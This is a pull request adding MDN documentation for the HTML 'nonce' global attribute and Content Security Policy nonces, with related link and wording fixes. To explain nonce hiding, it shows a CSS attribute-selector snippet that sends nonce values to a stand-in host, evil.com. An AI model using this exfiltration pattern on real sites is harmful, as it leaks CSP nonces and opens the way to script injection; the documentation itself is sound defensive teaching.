### PR TITLE
Document nonce global attribute

### DIFF
--- a/files/en-us/web/api/htmlorforeignelement/nonce/index.html
+++ b/files/en-us/web/api/htmlorforeignelement/nonce/index.html
@@ -55,6 +55,7 @@ tags:
 <h2 id="See_also">See also</h2>
 
 <ul>
+ <li><a href="/en-US/docs/Web/HTML/Global_attributes/nonce"><code>nonce</code> global attribute</a></li>
  <li><a href="/en-US/docs/Web/HTTP/CSP">Content Security Policy</a></li>
  <li>CSP: {{CSP("script-src")}}</li>
 </ul>

--- a/files/en-us/web/html/global_attributes/index.html
+++ b/files/en-us/web/html/global_attributes/index.html
@@ -94,6 +94,8 @@ tags:
  <dd>Specifies the URL of the vocabulary that will be used to define <code>itemprop</code>s (item properties) in the data structure. {{HTMLAttrxRef("itemscope")}} is used to set the scope of where in the data structure the vocabulary set by <code>itemtype</code> will be active.</dd>
  <dt><a href="/en-US/docs/Web/HTML/Global_attributes/lang">{{HTMLAttrDef("lang")}}</a></dt>
  <dd>Helps define the language of an element: the language that non-editable elements are in, or the language that editable elements should be written in by the user. The attribute contains one “language tag” (made of hyphen-separated “language subtags”) in the format defined in <a class="external" href="https://www.ietf.org/rfc/bcp/bcp47.txt"><em>Tags for Identifying Languages (BCP47)</em></a>. <a href="#attr-xml:lang"><strong>xml:lang</strong></a> has priority over it.</dd>
+ <dt><a href="/en-US/docs/Web/HTML/Global_attributes/nonce">{{HTMLAttrDef("nonce")}}</a></dt>
+ <dd>A cryptographic nonce ("number used once") which can be used by <a href="/en-US/docs/Web/HTTP/CSP">Content Security Policy</a> to determine whether or not a given fetch will be allowed to proceed.</dd>
  <dt><a href="/en-US/docs/Web/HTML/Global_attributes/part">{{HTMLAttrDef("part")}}</a></dt>
  <dd>A space-separated list of the part names of the element. Part names allows CSS to select and style specific elements in a shadow tree via the {{CSSxRef("::part")}} pseudo-element.</dd>
  <dt><a href="/en-US/docs/Web/HTML/Global_attributes/slot">{{HTMLAttrDef("slot")}}</a></dt>

--- a/files/en-us/web/html/global_attributes/index.html
+++ b/files/en-us/web/html/global_attributes/index.html
@@ -47,7 +47,7 @@ tags:
  <dt><a href="/en-US/docs/Web/HTML/Global_attributes/contextmenu">{{HTMLAttrDef("contextmenu")}}</a> {{Obsolete_Inline}}</dt>
  <dd>The <code><a href="#attr-id"><strong>id</strong></a></code> of a {{HTMLElement("menu")}} to use as the contextual menu for this element.</dd>
  <dt><a href="/en-US/docs/Web/HTML/Global_attributes/data-*">{{HTMLAttrDef("data-*")}}</a></dt>
- <dd>Forms a class of attributes, called custom data attributes, that allow proprietary information to be exchanged between the <a href="/en-US/docs/Web/HTML">HTML</a> and its {{glossary("DOM")}} representation that may be used by scripts. All such custom data are available via the {{DOMxRef("HTMLElement")}} interface of the element the attribute is set on. The {{DOMxRef("HTMLElement.dataset")}} property gives access to them.</dd>
+ <dd>Forms a class of attributes, called custom data attributes, that allow proprietary information to be exchanged between the <a href="/en-US/docs/Web/HTML">HTML</a> and its {{glossary("DOM")}} representation that may be used by scripts. All such custom data are available via the {{DOMxRef("HTMLElement")}} interface of the element the attribute is set on. The {{DOMxRef("HTMLOrForeignElement/dataset")}} property gives access to them.</dd>
  <dt><a href="/en-US/docs/Web/HTML/Global_attributes/dir">{{HTMLAttrDef("dir")}}</a></dt>
  <dd>An enumerated attribute indicating the directionality of the element's text. It can have the following values:
  <ul>
@@ -57,7 +57,7 @@ tags:
  </ul>
  </dd>
  <dt><a href="/en-US/docs/Web/HTML/Global_attributes/draggable">{{HTMLAttrDef("draggable")}}</a></dt>
- <dd>An enumerated attribute indicating whether the element can be dragged, using the <a href="/en-us/docs/DragDrop/Drag_and_Drop">Drag and Drop API</a>. It can have the following values:
+ <dd>An enumerated attribute indicating whether the element can be dragged, using the <a href="/en-US/docs/Web/API/HTML_Drag_and_Drop_API">Drag and Drop API</a>. It can have the following values:
  <ul>
   <li><code>true</code>, which indicates that the element may be dragged</li>
   <li><code>false</code>, which indicates that the element may not be dragged.</li>
@@ -97,7 +97,7 @@ tags:
  <dt><a href="/en-US/docs/Web/HTML/Global_attributes/part">{{HTMLAttrDef("part")}}</a></dt>
  <dd>A space-separated list of the part names of the element. Part names allows CSS to select and style specific elements in a shadow tree via the {{CSSxRef("::part")}} pseudo-element.</dd>
  <dt><a href="/en-US/docs/Web/HTML/Global_attributes/slot">{{HTMLAttrDef("slot")}}</a></dt>
- <dd>Assigns a slot in a <a href="/en-US/docs/Web/Web_Components/Shadow_DOM">shadow DOM</a> shadow tree to an element: An element with a <code>slot</code> attribute is assigned to the slot created by the {{HTMLElement("slot")}} element whose {{HTMLAttrxRef("name", "slot")}} attribute's value matches that <code>slot</code> attribute's value.</dd>
+ <dd>Assigns a slot in a <a href="/en-US/docs/Web/Web_Components/Using_shadow_DOM">shadow DOM</a> shadow tree to an element: An element with a <code>slot</code> attribute is assigned to the slot created by the {{HTMLElement("slot")}} element whose {{HTMLAttrxRef("name", "slot")}} attribute's value matches that <code>slot</code> attribute's value.</dd>
  <dt><a href="/en-US/docs/Web/HTML/Global_attributes/spellcheck">{{HTMLAttrDef("spellcheck")}}</a></dt>
  <dd>An enumerated attribute defines whether the element may be checked for spelling errors. It may have the following values:
  <ul>

--- a/files/en-us/web/html/global_attributes/nonce/index.html
+++ b/files/en-us/web/html/global_attributes/nonce/index.html
@@ -1,0 +1,94 @@
+---
+title: nonce
+slug: Web/HTML/Global_attributes/nonce
+tags:
+  - Global attributes
+  - HTML
+  - Reference
+---
+<div>{{HTMLSidebar("Global_attributes")}}</div>
+
+<p>The <strong><code>nonce</code></strong> <a href="/en-US/docs/Web/HTML/Global_attributes">global attribute</a> 
+is a content attribute defining a cryptographic nonce ("number used once") which can be used by
+<a href="/en-US/docs/Web/HTTP/CSP">Content Security Policy</a> to determine whether or not a given fetch will 
+be allowed to proceed for a given element.</p>
+
+<h2>Description</h2>
+
+<p>The <code>nonce</code> attribute is useful to allow-list specific elements, such as a particular inline script or style elements.
+It can help you to avoid using the <a href="/en-US/docs/Web/HTTP/CSP">CSP</a> <code>unsafe-inline</code> directive which would allow-list <em>all</em> inline scripts or styles.</p>
+
+<div class="note">Note: Only use <code>nonce</code> for cases where you have no way around using unsafe inline script
+or style contents. If you don't need <code>nonce</code>, don't use it. If your script is static, you could also use a CSP hash instead 
+(see usage notes on <a href="/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/script-src#unsafe_inline_script">unsafe inline script</a>)
+Always try to take full advantage of <a href="/en-US/docs/Web/HTTP/CSP">CSP</a> protections and avoid nonces or unsafe inline scripts whenever possible.</div>
+
+<h3>Using nonce to allow-list a &lt;script&gt; element</h3>
+
+<p>There are a few steps involved to allow-list an inline script using the nonce mechanism:</p>
+
+<h4>Generating values</h4>
+<p>From your web server, generate a random base64-encoded string of at least 128 bits of data from a cryptographically secure 
+random number generator. Nonces should be generated differently each time the page loads (nonce only once!). For example, in nodejs:</p>
+
+<pre class="brush: css">
+const crypto = require('crypto');
+crypto.randomBytes(16).toString('base64');
+// '8IBTHwOdqNKAWeKl7plt8g=='
+</pre>
+
+<h4>Allow-listing inline script</h4>
+
+<p>The nonce generated on your backend code should now be used for the inline script that you'd like to allow-list:</p>
+
+<pre class="brush: html">&lt;script nonce="8IBTHwOdqNKAWeKl7plt8g=="&gt;…&lt;/script&gt;</pre>
+
+<h4>Sending nonce with a CSP header</h4>
+
+<p>Finally, you'll need to send the nonce value in a 
+<a href="/en-US/docs/Web/HTTP/Headers/Content-Security-Policy"><code>Content-Security-Policy</code></a> header 
+(prepend <code>nonce-</code>):</p>
+
+<pre class="brush: http">Content-Security-Policy: script-src 'nonce-8IBTHwOdqNKAWeKl7plt8g=='</pre>
+
+<h3>Accessing nonces and nonce hiding</h3>
+
+<p>For security reasons, the <code>nonce</code> content attribute is hidden (an empty string will be returned).</p>
+<pre class="brush: js example-bad">script.getAttribute('nonce'); // returns empty string</pre>
+
+<p>The <a href="/en-US/docs/Web/API/HTMLOrForeignElement/nonce"><code>nonce</code></a> property is only way to access nonces:</p>
+<pre class="brush: js example-good">script.nonce; // returns nonce value</pre>
+
+<p>Nonce hiding helps preventing that attackers exfiltrate nonce data via mechanisms that can grab data 
+from content attributes like this:</p>
+
+<pre class="brush: css example-bad">script[nonce~=whatever] {
+  background: url("https://evil.com/nonce?whatever");
+}</pre>
+
+<h2 id="Specifications">Specifications</h2>
+
+<table class="standard-table">
+ <thead>
+  <tr>
+   <th scope="col">Specification</th>
+  </tr>
+ </thead>
+ <tbody>
+  <tr>
+   <td>{{SpecName('HTML WHATWG', "interaction.html#attr-nonce", "nonce")}}</td>
+  </tr>
+ </tbody>
+</table>
+
+<h2 id="Browser_compatibility">Browser compatibility</h2>
+
+<p>{{Compat("html.global_attributes.nonce")}}</p>
+
+<h2 id="See_also">See also</h2>
+
+<ul>
+ <li><a href="/en-US/docs/Web/API/HTMLOrForeignElement/nonce"><code>HTMLOrForeignElement.nonce</code></a></li>
+ <li><a href="/en-US/docs/Web/HTTP/CSP">Content Security Policy</a></li>
+ <li>CSP: <a href="/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/script-src"><code>script-src</code></a></li>
+</ul>

--- a/files/en-us/web/html/global_attributes/nonce/index.html
+++ b/files/en-us/web/html/global_attributes/nonce/index.html
@@ -76,7 +76,7 @@ from content attributes like this:</p>
  </thead>
  <tbody>
   <tr>
-   <td>{{SpecName('HTML WHATWG', "interaction.html#attr-nonce", "nonce")}}</td>
+   <td>{{SpecName('HTML WHATWG', "urls-and-fetching.html#attr-nonce", "nonce")}}</td>
   </tr>
  </tbody>
 </table>

--- a/files/en-us/web/html/global_attributes/nonce/index.html
+++ b/files/en-us/web/html/global_attributes/nonce/index.html
@@ -16,11 +16,11 @@ be allowed to proceed for a given element.</p>
 <h2>Description</h2>
 
 <p>The <code>nonce</code> attribute is useful to allow-list specific elements, such as a particular inline script or style elements.
-It can help you to avoid using the <a href="/en-US/docs/Web/HTTP/CSP">CSP</a> <code>unsafe-inline</code> directive which would allow-list <em>all</em> inline scripts or styles.</p>
+It can help you to avoid using the <a href="/en-US/docs/Web/HTTP/CSP">CSP</a> <code>unsafe-inline</code> directive, which would allow-list <em>all</em> inline scripts or styles.</p>
 
 <div class="note">Note: Only use <code>nonce</code> for cases where you have no way around using unsafe inline script
-or style contents. If you don't need <code>nonce</code>, don't use it. If your script is static, you could also use a CSP hash instead 
-(see usage notes on <a href="/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/script-src#unsafe_inline_script">unsafe inline script</a>)
+or style contents. If you don't need <code>nonce</code>, don't use it. If your script is static, you could also use a CSP hash instead.
+(See usage notes on <a href="/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/script-src#unsafe_inline_script">unsafe inline script</a>.)
 Always try to take full advantage of <a href="/en-US/docs/Web/HTTP/CSP">CSP</a> protections and avoid nonces or unsafe inline scripts whenever possible.</div>
 
 <h3>Using nonce to allow-list a &lt;script&gt; element</h3>
@@ -43,7 +43,7 @@ crypto.randomBytes(16).toString('base64');
 
 <pre class="brush: html">&lt;script nonce="8IBTHwOdqNKAWeKl7plt8g=="&gt;…&lt;/script&gt;</pre>
 
-<h4>Sending nonce with a CSP header</h4>
+<h4>Sending a nonce with a CSP header</h4>
 
 <p>Finally, you'll need to send the nonce value in a 
 <a href="/en-US/docs/Web/HTTP/Headers/Content-Security-Policy"><code>Content-Security-Policy</code></a> header 
@@ -56,10 +56,10 @@ crypto.randomBytes(16).toString('base64');
 <p>For security reasons, the <code>nonce</code> content attribute is hidden (an empty string will be returned).</p>
 <pre class="brush: js example-bad">script.getAttribute('nonce'); // returns empty string</pre>
 
-<p>The <a href="/en-US/docs/Web/API/HTMLOrForeignElement/nonce"><code>nonce</code></a> property is only way to access nonces:</p>
+<p>The <a href="/en-US/docs/Web/API/HTMLOrForeignElement/nonce"><code>nonce</code></a> property is the only way to access nonces:</p>
 <pre class="brush: js example-good">script.nonce; // returns nonce value</pre>
 
-<p>Nonce hiding helps preventing that attackers exfiltrate nonce data via mechanisms that can grab data 
+<p>Nonce hiding helps prevent attackers from exfiltrating nonce data via mechanisms that can grab data 
 from content attributes like this:</p>
 
 <pre class="brush: css example-bad">script[nonce~=whatever] {


### PR DESCRIPTION
Adding docs for the `nonce` global attribute.

r? @sideshowbarker

I was wondering why this is a global attribute instead of an attribute on `<script>` and `<style>` but I think the answer is that there could be inline styles and `href="javascript:"` on any element? Should the doc talk about that, too?